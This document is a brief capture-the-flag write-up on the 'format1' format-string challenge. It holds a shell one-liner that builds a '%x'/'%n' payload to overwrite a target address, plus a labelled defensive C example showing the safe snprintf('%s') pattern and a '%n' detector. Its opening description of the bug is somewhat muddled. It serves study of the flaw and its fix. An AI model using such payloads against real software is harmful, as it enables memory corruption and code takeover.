Format 1
Format string vulnerabilities (memory leak). Functions are called simply by placing their address on the stack.
Using objdump -t we can find the target address. Since the program arguments are simply stored on the stack
./format1 "`python -c "print 'AAAA' + '\x38\x96\x04\x08' + 'BBBB' + '%x '*127 + '%n '"`"
def pad(s):
    return (s+"A"*500)[:500]  # returns only first 500 chars

pad("Hello")
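The root cause behind the command above, seen from the fixing side, as an added example that is not code from the original page or from the challenge: it assumes the program hands its argument straight to printf as the format. The names render_safe and count_directives are hypothetical and the sample strings are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern, shown only as a comment for contrast:
 *     printf(untrusted);   // untrusted text is parsed as the format
 * Hardened form: untrusted data is only an argument to a constant format. */
int render_safe(char *out, size_t n, const char *untrusted) {
    return snprintf(out, n, "%s", untrusted);
}

/* Audit helper: count conversion directives in a string that should be plain
 * data. Sets *has_n when a directive is %n, the one that writes to memory.
 * "%%" is a literal percent sign and is not counted. */
int count_directives(const char *s, int *has_n) {
    int count = 0;
    *has_n = 0;
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%') continue;
        if (s[i + 1] == '%') { i++; continue; }
        size_t j = i + 1;
        /* skip flags, width, precision, positional "$" and length modifiers */
        while (s[j] != '\0' && strchr("0123456789$#-+ '.*hlLqjzt", s[j])) j++;
        if (s[j] == '\0') break;            /* dangling '%' at end of string */
        count++;
        if (s[j] == 'n') *has_n = 1;
        i = j;
    }
    return count;
}

int main(void) {
    const char *arg = "AAAA %x %x %n";      /* constructed sample input */
    char buf[64];
    int has_n;
    int n = count_directives(arg, &has_n);
    render_safe(buf, sizeof buf, arg);
    printf("directives=%d has_n=%d safe_output=\"%s\"\n", n, has_n, buf);
    return 0;
}
```

With the constant "%s" format the directives come out as literal text, so nothing is read from or written to the stack. Building with -Wformat -Wformat-security makes the compiler flag the commented-out pattern.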